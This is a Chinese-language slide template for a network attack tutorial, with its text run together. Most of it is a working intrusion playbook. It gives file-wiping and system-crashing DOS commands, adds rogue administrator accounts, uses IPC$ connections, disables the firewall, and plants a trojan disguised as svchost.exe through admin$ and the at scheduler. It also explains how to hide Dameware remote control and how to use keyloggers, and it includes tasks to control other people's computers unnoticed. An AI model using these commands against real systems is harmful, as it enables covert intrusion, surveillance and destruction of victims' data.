网络安全攻防技术教程PPT模板

网络安全攻防技术教程网络净化安全保障智能防护汇报人：xxx时间：20XX.X.XX目录01常用的DOS命令02常用的入侵命令03纯DOS命令入侵04图形界面的入侵05流行远程控制木马的使用方法06键盘记录程序的使用方法CONTENTS常用的DOS命令网络净化安全保障智能防护PART01常用的DOS命令•Cd切换目录•Dir列出所有文件信息•Del删除文件•Md创建目录Rd删除目录•Copy复制•Xcopy复制文件和文件夹•Cls清屏•Attrib修改文件、文件夹属性•Date、Time显示日期、时间常用的DOS命令•Path系统路径•Set显示、设置系统信息•Ren(Rename)重命名•Subst虚拟磁盘•Ver显示操作系统版本•Help帮助•/?显示某条命令的帮助非主流DOS命令101重复执行某条命令直至死机的批处理代码：startcmd%002复制一个文件的磁盘的每个子文件夹当中：for/r/d%ain(*)docopytest.txt%a/y03不停地执行同一条命令：for/l%ain(1,0,2)donetsend192.168.1.1炸弹来了！04死机,蓝屏ntsd-cq-pnwinlogon.exentsd-cq-pncsrss.exe非主流DOS命令105删除磁盘所有文件：del*/a/s/q/f06创建名字为空的文件夹：md(按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车)07创建无法删除的特殊名字文件夹：md\\.\c:\conmd\\.\c:\aux08创建无法双击打开无法删除的另类文件夹：mdtest..\rdtest..\/s/d常用的入侵命令网络净化安全保障智能防护PART02常用的入侵命令●netuser用户名密码/add(建立用户)●netlocalgroupadministrators用户名密码/add(将用户加到管理员，使其拥有管理权限)●netuserguest/active:Yes(激活guest用户)●netuserguest12345(修改guest密码为12345)●netuser(查看账号属性)●netuse\\ip\ipc$“”/user(建立空IPC连接)●netuse\\ip\ipc$“密码”/user:“用户名”(建立IPC非空连接，非空链接就是需要帐户和密码)●netuse\\ip\ipc$/del(删除IPC空连接)●netusez:\\127.0.0.1\c$(映射目标主机磁盘c盘到本地磁盘Z盘)常用的入侵命令●netstart(查看开启了哪些服务)●netstart服务名(开启服务)●nettime\\目标IP(查看对方时间)●netview(查看局域网中开启了哪些共享)●netshare(查看本地开启的哪些共享)●netshareC$/del(删除C盘默认共享)●netstat-an(查看计算机开放了哪些端口)●Copyxx.exe\\ip\admin$\System32(将当前xx.exe复制到对方Admin$共享的System32目录内)常用的入侵命令●scconfigtlnesvrstart=auto(修改telnet服务的启动方式为自动，auto前面有一个空格)●netstopsharedaccess(关闭系统自带的防火墙)●netsendIP消息(利用messenger服务向目标IP发送消息)●ntsd-cq-pnwinlogon.exe(蓝屏重启)●ntsd-cq-pncsrss.exe(死机)●tasklist(查看进程)●taskkill(结束进程)纯DOS命令入侵网络净化安全保障智能防护PART03实战：纯DOS命令入侵●netuse\\xxxx$“123”/user:”administrator”●nettime\\xxxxx●Copyc:\server.exe\\xxxxxxx\admin$\svchost.exe●At\\1xxxxxxxx12:00startc:\windows\svchost.exe这样，对方就中了灰鸽子服务端了。几个小例子01开启禁用的telnet服务scconfigtlntsvrstart=auto(auto前有空格)02开启3389远程终端regadd03开启C盘默认共享netsharec$=c:04开启计划任务服务（at命令需要这一服务）netstartschedule02开启远程注册表(RemoteRegistry)服务netstartremoteregistry图形界面的入侵网络净化安全保障智能防护PART04图形界面的入侵计算机管理01操作菜单→连接到另一台计算机注册表编辑器02文件菜单→连接网络注册表第三方工具03比如Dameware、Pcanywhere流行远程控制木马的使用方法网络净化安全保障智能防护PART05Dameware的隐藏用Dameware控制对方，要做到悄无声息，需要注意以下几点：01点帮助菜单→激活软件，输入注册码注册软件；02在远程连接对话框上单击“设置”，勾选：“查看模式”和“显示远程鼠标指针”；03切换到“安装选项”选项卡，勾选上“复制配置文件”然后点“编辑”；04把“附加设置”选项卡上“允许托盘图标”勾掉；05再把“通知对话”选项卡上“连接时通知”勾掉。XP默认不能远程控制的原因●在运行中输入命令secpol.msc打开安全策略●展开“本地策略”“安全选项”(红色表示默认选项)●“安全选项：本地账户的共享和安全模式”▲经典，表示在远程可以拥有管理员权限▲仅来宾，表示在远程只能拥有guest权限●“账户：使用空白密码的账户只允许进行控制台登录”▲启用，账户密码为空则不允许远程访问▲禁用，账户密码为空也允许远程访问●所以，要想控制系统为XP的计算机，必须考虑对方安全策略的设置。●安全策略的设置不影响利用木马进行控制。灰鸽子以华夏灰鸽子2009为例，注意事项：IP地址栏一定要填写自己的IP地址，而且不要忘了加上冒号和端口号键盘记录程序的使用方法网络净化安全保障智能防护PART06键盘记录以“keyghost”和“简单键盘记录程序”为例实验任务练习前面PPT中的DOS命令●开一台2003虚拟机，利用命令入侵，以能够telnet到对方电脑为入侵成功的标志●开一台2003虚拟机，利用图形界面入侵，以能够控制对方桌面为入侵成功的标志●使用远控软件Dameware控制别人电脑（要求：悄无声息，不能被对方发现）●利用灰鸽子控制别人电脑谢谢观看网络净化安全保障智能防护汇报人：xxx时间：20XX.X.XX